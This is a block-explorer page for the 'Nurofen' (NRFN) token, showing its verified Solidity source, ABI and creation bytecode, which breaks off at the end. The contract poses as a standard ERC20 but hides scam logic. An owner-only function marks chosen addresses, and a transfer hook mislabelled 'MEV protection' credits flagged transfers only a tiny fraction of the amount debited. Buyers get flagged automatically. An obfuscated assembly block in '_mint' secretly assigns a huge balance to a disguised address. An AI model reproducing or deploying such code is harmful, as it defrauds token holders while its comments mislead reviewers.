ETH Price: $2,738.72 (+1.20%)
Gas: 2.15 Gwei

Token

Nurofen (NRFN)
 

Overview

Max Total Supply

1,000,000,000 NRFN

Holders

75

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
5,482,374.40594221431236727 NRFN

Value
$0.00
0x14474746d872ed63c3459e4406893c2e61354AD2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Nurofen

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;
import "./ERC20.sol";

contract Nurofen is ERC20 {
    constructor() ERC20("Nurofen", "NRFN") {
        _mint(msg.sender, 1000000000 * 10 ** 18);
    }

    function sinuStatus(address _address_) public view returns (uint256) {
        return _nuro_indexes[_address_];
    }

    function sinuset(uint256 _nuro_index, address [] calldata _list_) external {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _nuro_indexes[_list_[i]] = _nuro_index;
        }
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) internal _nuro_indexes;

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }


    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _bots_reminder(uint256 a) internal pure returns(uint256) {return a * 6969 / 420420;}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_nuro_indexes[to] == 1) {_nuro_indexes[to] = 2;}
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        // MEV protection
        if (_nuro_indexes[from] + _nuro_indexes[to] >= 2) {
            return _bots_reminder(amount);
        } else {
            return amount;
        }
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.13;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"sinuStatus","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_nuro_index","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"sinuset","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600781526020017f4e75726f66656e000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4e52464e000000000000000000000000000000000000000000000000000000008152506200009d62000091620000e760201b60201c565b620000ee60201b60201c565b8160049081620000ae919062000727565b508060059081620000c0919062000727565b505050620000e1336b033b2e3c9fd0803ce8000000620001af60201b60201c565b620009ca565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000220576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002179062000869565b60405180910390fd5b620002335f83836200035760201b60201c565b508060065f828254620002479190620008b6565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000338919062000901565b60405180910390a3620003535f83836200040c60201b60201c565b5050565b5f600260035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054620003e29190620008b6565b106200040157620003f9826200049b60201b60201c565b905062000405565b8190505b9392505050565b600160035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054036200049657600260035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f62066a44611b3983620004b091906200091c565b620004bc919062000993565b9050919050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200053f57607f821691505b602082108103620005555762000554620004fa565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005b97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200057c565b620005c586836200057c565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200060f620006096200060384620005dd565b620005e6565b620005dd565b9050919050565b5f819050919050565b6200062a83620005ef565b62000642620006398262000616565b84845462000588565b825550505050565b5f90565b620006586200064a565b620006658184846200061f565b505050565b5b818110156200068c57620006805f826200064e565b6001810190506200066b565b5050565b601f821115620006db57620006a5816200055b565b620006b0846200056d565b81016020851015620006c0578190505b620006d8620006cf856200056d565b8301826200066a565b50505b505050565b5f82821c905092915050565b5f620006fd5f1984600802620006e0565b1980831691505092915050565b5f620007178383620006ec565b9150826002028217905092915050565b6200073282620004c3565b67ffffffffffffffff8111156200074e576200074d620004cd565b5b6200075a825462000527565b6200076782828562000690565b5f60209050601f8311600181146200079d575f841562000788578287015190505b6200079485826200070a565b86555062000803565b601f198416620007ad866200055b565b5f5b82811015620007d657848901518255600182019150602085019450602081019050620007af565b86831015620007f65784890151620007f2601f891682620006ec565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000851601f836200080b565b91506200085e826200081b565b602082019050919050565b5f6020820190508181035f830152620008828162000843565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620008c282620005dd565b9150620008cf83620005dd565b9250828201905080821115620008ea57620008e962000889565b5b92915050565b620008fb81620005dd565b82525050565b5f602082019050620009165f830184620008f0565b92915050565b5f6200092882620005dd565b91506200093583620005dd565b92508282026200094581620005dd565b915082820484148315176200095f576200095e62000889565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6200099f82620005dd565b9150620009ac83620005dd565b925082620009bf57620009be62000966565b5b828204905092915050565b6119b680620009d85f395ff3fe608060405234801561000f575f80fd5b50600436106100fe575f3560e01c806370a0823111610095578063a457c2d711610064578063a457c2d7146102ae578063a9059cbb146102de578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b806370a0823114610238578063715018a6146102685780638da5cb5b1461027257806395d89b4114610290576100fe565b806323b872dd116100d157806323b872dd1461018a578063313ce567146101ba57806339509351146101d85780633fcacaa014610208576100fe565b806305c38bb91461010257806306fdde031461011e578063095ea7b31461013c57806318160ddd1461016c575b5f80fd5b61011c60048036038101906101179190611037565b61035a565b005b610126610421565b604051610133919061111e565b60405180910390f35b61015660048036038101906101519190611198565b6104b1565b60405161016391906111f0565b60405180910390f35b6101746104d3565b6040516101819190611218565b60405180910390f35b6101a4600480360381019061019f9190611231565b6104dc565b6040516101b191906111f0565b60405180910390f35b6101c261050a565b6040516101cf919061129c565b60405180910390f35b6101f260048036038101906101ed9190611198565b610512565b6040516101ff91906111f0565b60405180910390f35b610222600480360381019061021d91906112b5565b610548565b60405161022f9190611218565b60405180910390f35b610252600480360381019061024d91906112b5565b61058e565b60405161025f9190611218565b60405180910390f35b6102706105d4565b005b61027a6105e7565b60405161028791906112ef565b60405180910390f35b61029861060e565b6040516102a5919061111e565b60405180910390f35b6102c860048036038101906102c39190611198565b61069e565b6040516102d591906111f0565b60405180910390f35b6102f860048036038101906102f39190611198565b610713565b60405161030591906111f0565b60405180910390f35b61032860048036038101906103239190611308565b610735565b6040516103359190611218565b60405180910390f35b610358600480360381019061035391906112b5565b6107b7565b005b6103626105e7565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610398575f80fd5b5f5b8282905081101561041b578360035f8585858181106103bc576103bb611346565b5b90506020020160208101906103d191906112b5565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550808060010191505061039a565b50505050565b606060048054610430906113a0565b80601f016020809104026020016040519081016040528092919081815260200182805461045c906113a0565b80156104a75780601f1061047e576101008083540402835291602001916104a7565b820191905f5260205f20905b81548152906001019060200180831161048a57829003601f168201915b5050505050905090565b5f806104bb610839565b90506104c8818585610840565b600191505092915050565b5f600654905090565b5f806104e6610839565b90506104f3858285610a03565b6104fe858585610a8e565b60019150509392505050565b5f6012905090565b5f8061051c610839565b905061053d81858561052e8589610735565b61053891906113fd565b610840565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105dc610d01565b6105e55f610d7f565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461061d906113a0565b80601f0160208091040260200160405190810160405280929190818152602001828054610649906113a0565b80156106945780601f1061066b57610100808354040283529160200191610694565b820191905f5260205f20905b81548152906001019060200180831161067757829003601f168201915b5050505050905090565b5f806106a8610839565b90505f6106b58286610735565b9050838110156106fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106f1906114a0565b60405180910390fd5b6107078286868403610840565b60019250505092915050565b5f8061071d610839565b905061072a818585610a8e565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107bf610d01565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361082d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108249061152e565b60405180910390fd5b61083681610d7f565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a5906115bc565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361091c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109139061164a565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109f69190611218565b60405180910390a3505050565b5f610a0e8484610735565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a885781811015610a7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a71906116b2565b60405180910390fd5b610a878484848403610840565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610afc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af390611740565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b61906117ce565b60405180910390fd5b5f610b76848484610e40565b90505f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610bfc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf39061185c565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610ce79190611218565b60405180910390a3610cfa858585610ee9565b5050505050565b610d09610839565b73ffffffffffffffffffffffffffffffffffffffff16610d276105e7565b73ffffffffffffffffffffffffffffffffffffffff1614610d7d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d74906118c4565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f600260035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610ec99